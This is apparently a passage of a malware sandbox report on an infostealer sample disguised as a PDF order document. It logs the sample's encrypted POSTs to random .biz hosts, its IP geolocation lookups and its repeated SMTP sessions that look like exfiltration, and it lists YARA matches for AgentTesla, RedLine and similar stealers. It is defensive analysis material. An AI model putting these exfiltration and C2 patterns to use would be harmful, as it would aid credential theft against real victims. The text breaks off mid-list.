Nov 28, 2024 06:44:58.161187887 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:44:57 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=01f5bdbcbc3b02974a686401de303f9d\|8.46.123.228\|1732772697\|1732772697\|0\|1\|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49952	34.246.200.160	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:44:58.848084927 CET	350	OUT	POST /bdggmyte HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pwlqfu.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:44:58.848113060 CET	778	OUT	Data Raw: 0c 41 a2 74 4f 3c a7 c4 fe 02 00 00 a9 ad 9e 3f d2 36 c3 46 f0 65 4b 0f 8d 5e c5 4a 80 54 0a a7 db 34 fe 45 b8 7a 02 a5 2f 5f 9a 72 65 05 e5 3c a2 b8 15 d3 ee 87 ab 65 d7 9b 65 bc ec fd 05 c6 3c 67 0a 7a 5b c2 a9 d5 fe 3e 2b 13 28 e8 71 8f e4 d0 Data Ascii: AtO<?6FeK^JT4Ez/_re<ee<gz[>+(qT'-g%6xTQi X4nhZcJ-Mn.n.8a%Y0GH<M7IL\|Z`fHpd*/}AUZR;tne=~E
Nov 28, 2024 06:45:00.222384930 CET	410	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:44:59 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=03699a66c5aeaa5b6577fcf8e11d2a73\|8.46.123.228\|1732772699\|1732772699\|0\|1\|0; path=/; domain=.pwlqfu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49953	47.129.31.212	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:45:01.055309057 CET	353	OUT	POST /lrupjiow HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: rrqafepng.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:45:01.055336952 CET	778	OUT	Data Raw: d7 4c ce 55 86 d1 c7 12 fe 02 00 00 09 b7 1c 5b f0 3c 06 2d 76 8b 74 ed ca ef b2 5e e7 81 a2 73 aa bf db 74 86 e5 80 6d f5 e4 6a bc 9e dc fe 88 2c 61 21 e2 b5 bf 5a 89 dc 27 37 58 9d 87 d3 62 e6 45 74 af be 4d 7c 0f db a3 ff 31 c4 4c 3b 72 ad b0 Data Ascii: LU[<-vt^stmj,a!Z'7XbEtM\|1L;r\|PrhHi0A4ewt4y&ZQ,2\|ELBE12UC8e]#e/vwXZ%=W{Px*o#aXw@hk]rS6cVT
Nov 28, 2024 06:45:03.193403959 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:45:02 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=5be5f0003c9c4f7cf3acb9d436ed9b7a\|8.46.123.228\|1732772702\|1732772702\|0\|1\|0; path=/; domain=.rrqafepng.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49954	3.94.10.34	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:45:03.811578989 CET	352	OUT	POST /svjoivwb HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ctdtgwag.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:45:03.811655998 CET	778	OUT	Data Raw: 37 19 73 d5 0e 37 70 16 fe 02 00 00 b3 fd 9c 0d 75 90 b6 29 7f dd 81 d2 fa 20 e9 71 d3 f4 4b c4 54 ac 8b d8 f4 16 cc c0 05 79 6c a9 57 24 ba db f1 76 55 23 81 76 17 8c 08 52 19 73 2a 59 40 75 e0 e9 a1 b7 09 72 1e 9f bd bc fd 05 ca fb 95 3b 21 25 Data Ascii: 7s7pu) qKTylW$vU#vRsY@ur;!%rpL?@Fy9Ev,6rOUyPbCohO9~`bBq0Q^#L9mm)~2BcnK#/r7F_,N
Nov 28, 2024 06:45:05.006124973 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:45:04 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=b70ab324662073ac68abae822cd7ef31\|8.46.123.228\|1732772704\|1732772704\|0\|1\|0; path=/; domain=.ctdtgwag.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	104.26.12.205	443	7692	C:\Users\user\AppData\Local\Temp\neworigin.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-28 05:41:07 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-28 05:41:07 UTC	424	IN	HTTP/1.1 200 OK Date: Thu, 28 Nov 2024 05:41:07 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8e9806f398c53350-EWR server-timing: cfL4;desc="?proto=TCP&rtt=2015&min_rtt=1979&rtt_var=816&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1284080&cwnd=173&unsent_bytes=0&cid=c88557318b4c83ac&ts=465&x=0"
2024-11-28 05:41:07 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38 Data Ascii: 8.46.123.228

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	172.67.177.134	443	7664	C:\Users\user\AppData\Local\Temp\server02.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-28 05:41:09 UTC	85	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-28 05:41:09 UTC	875	IN	HTTP/1.1 200 OK Date: Thu, 28 Nov 2024 05:41:09 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 35640 Last-Modified: Wed, 27 Nov 2024 19:47:09 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MpeqBAgalMwRl9SrzDp%2B808j6OXGEGoufOFJrx4qdSgbvdqbBI33lK90BgUo0OdF%2FOMWcQibm7Obz6TC8sX7q5MSMS2W4y6MMyKcIQwoqyRx4DT5Igc85Bo6u5LPQUnGO9c%2F2wV2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e9806ff4d23c341-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1642&min_rtt=1634&rtt_var=629&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1715628&cwnd=177&unsent_bytes=0&cid=b6011cc702855696&ts=513&x=0"
2024-11-28 05:41:09 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 28, 2024 06:41:10.866259098 CET	587	49738	51.195.88.199	192.168.2.4	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 05:41:10 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 28, 2024 06:41:10.866449118 CET	49738	587	192.168.2.4	51.195.88.199	EHLO 258555
Nov 28, 2024 06:41:11.278064966 CET	587	49738	51.195.88.199	192.168.2.4	250-s82.gocheapweb.com Hello 258555 [8.46.123.228] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 28, 2024 06:41:11.278254032 CET	49738	587	192.168.2.4	51.195.88.199	STARTTLS
Nov 28, 2024 06:41:11.690181017 CET	587	49738	51.195.88.199	192.168.2.4	220 TLS go ahead
Nov 28, 2024 06:41:18.762631893 CET	587	49744	51.195.88.199	192.168.2.4	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 05:41:18 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 28, 2024 06:41:18.762768984 CET	49744	587	192.168.2.4	51.195.88.199	EHLO 258555
Nov 28, 2024 06:41:19.175647974 CET	587	49744	51.195.88.199	192.168.2.4	250-s82.gocheapweb.com Hello 258555 [8.46.123.228] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 28, 2024 06:41:19.175888062 CET	49744	587	192.168.2.4	51.195.88.199	STARTTLS
Nov 28, 2024 06:41:19.589180946 CET	587	49744	51.195.88.199	192.168.2.4	220 TLS go ahead
Nov 28, 2024 06:43:11.648458004 CET	587	49906	51.195.88.199	192.168.2.4	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 05:43:11 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 28, 2024 06:43:11.648516893 CET	587	49905	51.195.88.199	192.168.2.4	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 05:43:11 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 28, 2024 06:43:11.648755074 CET	49906	587	192.168.2.4	51.195.88.199	EHLO 258555
Nov 28, 2024 06:43:11.648752928 CET	49905	587	192.168.2.4	51.195.88.199	EHLO 258555
Nov 28, 2024 06:43:12.061531067 CET	587	49905	51.195.88.199	192.168.2.4	250-s82.gocheapweb.com Hello 258555 [8.46.123.228] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 28, 2024 06:43:12.061908960 CET	49905	587	192.168.2.4	51.195.88.199	STARTTLS
Nov 28, 2024 06:43:12.064930916 CET	587	49906	51.195.88.199	192.168.2.4	250-s82.gocheapweb.com Hello 258555 [8.46.123.228] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 28, 2024 06:43:12.066971064 CET	49906	587	192.168.2.4	51.195.88.199	STARTTLS
Nov 28, 2024 06:43:12.474795103 CET	587	49905	51.195.88.199	192.168.2.4	220 TLS go ahead
Nov 28, 2024 06:43:12.483424902 CET	587	49906	51.195.88.199	192.168.2.4	220 TLS go ahead
Nov 28, 2024 06:43:25.154645920 CET	587	49913	51.195.88.199	192.168.2.4	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 05:43:24 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 28, 2024 06:43:25.157038927 CET	49913	587	192.168.2.4	51.195.88.199	EHLO 258555
Nov 28, 2024 06:43:25.580255032 CET	587	49913	51.195.88.199	192.168.2.4	250-s82.gocheapweb.com Hello 258555 [8.46.123.228] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 28, 2024 06:43:25.581249952 CET	49913	587	192.168.2.4	51.195.88.199	STARTTLS
Nov 28, 2024 06:43:26.036823034 CET	587	49913	51.195.88.199	192.168.2.4	220 TLS go ahead
Nov 28, 2024 06:43:29.512679100 CET	587	49916	51.195.88.199	192.168.2.4	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 05:43:29 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 28, 2024 06:43:29.522195101 CET	49916	587	192.168.2.4	51.195.88.199	EHLO 258555
Nov 28, 2024 06:43:29.934513092 CET	587	49916	51.195.88.199	192.168.2.4	250-s82.gocheapweb.com Hello 258555 [8.46.123.228] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 28, 2024 06:43:29.938678980 CET	49916	587	192.168.2.4	51.195.88.199	STARTTLS
Nov 28, 2024 06:43:30.351437092 CET	587	49916	51.195.88.199	192.168.2.4	220 TLS go ahead
Nov 28, 2024 06:43:49.621330976 CET	587	49919	51.195.88.199	192.168.2.4	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 05:43:49 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 28, 2024 06:43:49.623207092 CET	49919	587	192.168.2.4	51.195.88.199	EHLO 258555
Nov 28, 2024 06:43:50.055493116 CET	587	49919	51.195.88.199	192.168.2.4	250-s82.gocheapweb.com Hello 258555 [8.46.123.228] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 28, 2024 06:43:50.055758953 CET	49919	587	192.168.2.4	51.195.88.199	STARTTLS
Nov 28, 2024 06:43:50.468648911 CET	587	49919	51.195.88.199	192.168.2.4	220 TLS go ahead
Nov 28, 2024 06:44:14.773083925 CET	587	49930	51.195.88.199	192.168.2.4	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 05:44:14 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 28, 2024 06:44:14.773258924 CET	49930	587	192.168.2.4	51.195.88.199	EHLO 258555
Nov 28, 2024 06:44:15.185344934 CET	587	49930	51.195.88.199	192.168.2.4	250-s82.gocheapweb.com Hello 258555 [8.46.123.228] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 28, 2024 06:44:15.185548067 CET	49930	587	192.168.2.4	51.195.88.199	STARTTLS
Nov 28, 2024 06:44:15.598090887 CET	587	49930	51.195.88.199	192.168.2.4	220 TLS go ahead
Nov 28, 2024 06:44:20.018310070 CET	587	49933	51.195.88.199	192.168.2.4	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 05:44:19 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 28, 2024 06:44:20.021085024 CET	49933	587	192.168.2.4	51.195.88.199	EHLO 258555
Nov 28, 2024 06:44:20.442821026 CET	587	49933	51.195.88.199	192.168.2.4	250-s82.gocheapweb.com Hello 258555 [8.46.123.228] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 28, 2024 06:44:20.442954063 CET	49933	587	192.168.2.4	51.195.88.199	STARTTLS
Nov 28, 2024 06:44:20.864504099 CET	587	49933	51.195.88.199	192.168.2.4	220 TLS go ahead
Nov 28, 2024 06:44:31.581063032 CET	587	49940	51.195.88.199	192.168.2.4	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 05:44:31 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 28, 2024 06:44:31.589015007 CET	49940	587	192.168.2.4	51.195.88.199	EHLO 258555
Nov 28, 2024 06:44:32.002568960 CET	587	49940	51.195.88.199	192.168.2.4	250-s82.gocheapweb.com Hello 258555 [8.46.123.228] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 28, 2024 06:44:32.003271103 CET	49940	587	192.168.2.4	51.195.88.199	STARTTLS
Nov 28, 2024 06:44:32.417274952 CET	587	49940	51.195.88.199	192.168.2.4	220 TLS go ahead
Nov 28, 2024 06:45:06.848984957 CET	587	49955	51.195.88.199	192.168.2.4	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 28 Nov 2024 05:45:06 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 28, 2024 06:45:06.849118948 CET	49955	587	192.168.2.4	51.195.88.199	EHLO 258555
Nov 28, 2024 06:45:07.274003983 CET	587	49955	51.195.88.199	192.168.2.4	250-s82.gocheapweb.com Hello 258555 [8.46.123.228] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 28, 2024 06:45:07.274163961 CET	49955	587	192.168.2.4	51.195.88.199	STARTTLS
Nov 28, 2024 06:45:07.699575901 CET	587	49955	51.195.88.199	192.168.2.4	220 TLS go ahead

Target ID:	0
Start time:	00:40:58
Start date:	28/11/2024
Path:	C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe"
Imagebase:	0x400000
File size:	2'267'648 bytes
MD5 hash:	EB8D251C25AB63697FB69A403AF0F09F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	00:40:58
Start date:	28/11/2024
Path:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Imagebase:	0x400000
File size:	1'290'240 bytes
MD5 hash:	A51EBECF3C5FA1A6BA9D9DC01B9461A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	00:40:59
Start date:	28/11/2024
Path:	C:\Windows\System32\alg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\alg.exe
Imagebase:	0x140000000
File size:	1'225'728 bytes
MD5 hash:	D3EEF25FD8C9FF095347CDF4A8DCE6D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	00:40:59
Start date:	28/11/2024
Path:	C:\Windows\System32\drivers\AppVStrm.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	138'056 bytes
MD5 hash:	BDA55F89B69757320BC125FF1CB53B26
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	00:40:59
Start date:	28/11/2024
Path:	C:\Windows\System32\drivers\AppvVemgr.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	174'408 bytes
MD5 hash:	E70EE9B57F8D771E2F4D6E6B535F6757
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	00:40:59
Start date:	28/11/2024
Path:	C:\Windows\System32\drivers\AppvVfs.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	154'952 bytes
MD5 hash:	2CBABD729D5E746B6BD8DC1B4B4DB1E1
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	00:40:59
Start date:	28/11/2024
Path:	C:\Windows\System32\AppVClient.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\AppVClient.exe
Imagebase:	0x140000000
File size:	1'348'608 bytes
MD5 hash:	6B5D6FF7CFD8D5165E8DF1E87AD43A65
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	00:41:00
Start date:	28/11/2024
Path:	C:\Users\user\AppData\Local\bothsided\surmit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe"
Imagebase:	0x400000
File size:	2'267'648 bytes
MD5 hash:	EB8D251C25AB63697FB69A403AF0F09F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000007.00000002.1725995787.00000000041A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	00:41:02
Start date:	28/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Imagebase:	0x140000000
File size:	2'354'176 bytes
MD5 hash:	2E272607CBEA10D875D90A573275C4C0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	00:41:02
Start date:	28/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe"
Imagebase:	0x20000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1739380973.0000000004EA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1737482854.00000000036A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1737482854.00000000036A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1737482854.00000000036A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1738828207.0000000004BC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1735755536.000000000244D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000009.00000002.1731407084.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	00:41:03
Start date:	28/11/2024
Path:	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Imagebase:	0x140000000
File size:	1'356'800 bytes
MD5 hash:	93C1838CCC468A3F28E0FBEA5291818F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	00:41:04
Start date:	28/11/2024
Path:	C:\Users\user\AppData\Local\Temp\TrojanAI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\TrojanAI.exe"
Imagebase:	0x6d0000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	00:41:04
Start date:	28/11/2024
Path:	C:\Users\user\AppData\Local\Temp\server02.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\server02.exe"
Imagebase:	0x880000
File size:	98'304 bytes
MD5 hash:	D49B97C9900DA1344E4E8481551CC14C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000C.00000000.1729292004.0000000000882000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000000.1729292004.0000000000882000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000000.1729292004.0000000000882000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000000.1729292004.0000000000882000.00000002.00000001.01000000.0000000A.sdmp, Author: unknown Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: Joe Security Rule: 